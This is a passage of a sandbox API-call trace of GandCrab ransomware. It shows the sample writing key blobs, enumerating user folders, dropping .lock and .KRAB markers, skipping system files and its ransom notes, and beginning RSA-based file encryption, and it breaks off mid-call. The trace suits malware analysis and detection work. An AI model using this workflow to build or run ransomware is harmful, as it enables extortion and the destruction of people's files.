zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0093.050] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0093.051] CloseHandle (hObject=0x320) returned 1 [0093.051] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.051] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.052] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x28, wMilliseconds=0xfc)) [0093.052] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.052] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.052] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.053] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\d2ca4a08d2ca4dee3d.lock") returned 51 [0093.053] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Links\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\links\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0093.053] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.054] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.054] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\") returned 28 [0093.054] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\*" [0093.054] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Links\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbd3e0 [0093.054] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.054] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0093.054] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.054] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.054] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0093.054] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0093.054] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0093.054] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\d2ca4a08d2ca4dee3d.lock" [0093.055] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.055] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 56 [0093.055] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\d2ca4a08d2ca4dee3d.lock") returned 51 [0093.055] lstrlenW (lpString=".lock") returned 5 [0093.055] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.068] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0093.068] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.074] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.074] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0093.074] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0093.074] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0093.074] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\desktop.ini" [0093.074] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.075] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\desktop.ini.KRAB") returned 44 [0093.075] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\desktop.ini") returned 39 [0093.075] lstrlenW (lpString=".ini") returned 4 [0093.075] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.075] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0093.075] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.076] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\desktop.ini") returned 39 [0093.076] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\desktop.ini") returned 39 [0093.076] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0093.076] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.076] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0093.076] lstrcmpW (lpString1="Desktop.lnk", lpString2=".") returned 1 [0093.076] lstrcmpW (lpString1="Desktop.lnk", lpString2="..") returned 1 [0093.076] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\", lpString2="Desktop.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\Desktop.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\Desktop.lnk" [0093.076] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.077] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\Desktop.lnk.KRAB") returned 44 [0093.077] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\Desktop.lnk") returned 39 [0093.077] lstrlenW (lpString=".lnk") returned 4 [0093.077] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.077] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lnk ") returned 5 [0093.077] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.078] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.078] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0093.078] lstrcmpW (lpString1="Downloads.lnk", lpString2=".") returned 1 [0093.078] lstrcmpW (lpString1="Downloads.lnk", lpString2="..") returned 1 [0093.078] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\", lpString2="Downloads.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\Downloads.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\Downloads.lnk" [0093.078] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.078] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\Downloads.lnk.KRAB") returned 46 [0093.078] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\Downloads.lnk") returned 41 [0093.079] lstrlenW (lpString=".lnk") returned 4 [0093.079] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.079] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lnk ") returned 5 [0093.079] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.079] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.080] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0093.080] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0093.080] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0093.080] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\KRAB-DECRYPT.txt" [0093.080] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.080] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\KRAB-DECRYPT.txt.KRAB") returned 49 [0093.080] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\KRAB-DECRYPT.txt") returned 44 [0093.080] lstrlenW (lpString=".txt") returned 4 [0093.080] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.081] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0093.081] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.081] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\KRAB-DECRYPT.txt") returned 44 [0093.081] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\KRAB-DECRYPT.txt") returned 44 [0093.081] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0093.081] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0093.081] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0093.081] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0093.081] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0093.081] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0093.081] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0093.081] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0093.081] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0093.081] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0093.081] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.082] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0093.082] lstrcmpW (lpString1="OneDrive.lnk", lpString2=".") returned 1 [0093.082] lstrcmpW (lpString1="OneDrive.lnk", lpString2="..") returned 1 [0093.082] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\", lpString2="OneDrive.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Links\\OneDrive.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\Links\\OneDrive.lnk" [0093.082] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.083] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Links\\OneDrive.lnk.KRAB") returned 45 [0093.083] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Links\\OneDrive.lnk") returned 40 [0093.083] lstrlenW (lpString=".lnk") returned 4 [0093.083] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.083] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lnk ") returned 5 [0093.083] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.084] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.084] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0093.084] FindClose (in: hFindFile=0xfbd3e0 | out: hFindFile=0xfbd3e0) returned 1 [0093.084] CloseHandle (hObject=0x320) returned 1 [0093.084] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0093.084] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0093.084] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0093.084] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Local Settings" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Local Settings") returned="C:\\Users\\CIiHmnxMn6Ps\\Local Settings" [0093.085] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Local Settings", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Local Settings\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Local Settings\\" [0093.085] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0093.127] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.127] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0093.127] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0093.127] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0093.127] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Music" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music") returned="C:\\Users\\CIiHmnxMn6Ps\\Music" [0093.127] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\" [0093.127] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0093.128] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.128] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.128] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.128] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.128] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.128] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.128] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\\\KRAB-DECRYPT.txt") returned 45 [0093.128] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0093.129] GetLastError () returned 0x50 [0093.129] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.129] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.129] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x28, wMilliseconds=0x145)) [0093.129] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.130] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.130] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.130] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\d2ca4a08d2ca4dee3d.lock") returned 51 [0093.130] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0093.130] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.131] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.131] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\") returned 28 [0093.131] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\*" [0093.131] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbd5a0 [0093.131] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.131] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0093.131] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.131] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.131] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0093.131] lstrcmpW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2=".") returned 1 [0093.131] lstrcmpW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="..") returned 1 [0093.131] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="-c6vpX_SqZGq97r z.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\-c6vpX_SqZGq97r z.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\-c6vpX_SqZGq97r z.m4a" [0093.131] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0093.132] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\-c6vpX_SqZGq97r z.m4a.KRAB") returned 54 [0093.134] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\-c6vpX_SqZGq97r z.m4a") returned 49 [0093.134] lstrlenW (lpString=".m4a") returned 4 [0093.134] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.134] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".m4a ") returned 5 [0093.135] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.135] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\-c6vpX_SqZGq97r z.m4a") returned 49 [0093.135] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\-c6vpX_SqZGq97r z.m4a") returned 49 [0093.135] lstrcmpiW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="desktop.ini") returned -1 [0093.135] lstrcmpiW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="autorun.inf") returned 1 [0093.135] lstrcmpiW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="ntuser.dat") returned -1 [0093.135] lstrcmpiW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="iconcache.db") returned -1 [0093.136] lstrcmpiW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="bootsect.bak") returned 1 [0093.136] lstrcmpiW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="boot.ini") returned 1 [0093.136] lstrcmpiW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="ntuser.dat.log") returned -1 [0093.136] lstrcmpiW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="thumbs.db") returned -1 [0093.136] lstrcmpiW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="KRAB-DECRYPT.html") returned -1 [0093.136] lstrcmpiW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.136] lstrcmpiW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="CRAB-DECRYPT.txt") returned -1 [0093.136] lstrcmpiW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="ntldr") returned -1 [0093.136] lstrcmpiW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="NTDETECT.COM") returned -1 [0093.136] lstrcmpiW (lpString1="-c6vpX_SqZGq97r z.m4a", lpString2="Bootfont.bin") returned 1 [0093.136] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0093.136] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10114e0) returned 1 [0093.137] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0093.138] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.138] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.138] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0093.138] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0093.138] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.138] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010e80) returned 1 [0093.139] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0093.139] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0093.139] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0093.139] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0093.139] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0093.140] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.140] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10112c0) returned 1 [0093.140] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd560) returned 1 [0093.140] CryptGetKeyParam (in: hKey=0xfbd560, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0093.140] CryptEncrypt (in: hKey=0xfbd560, 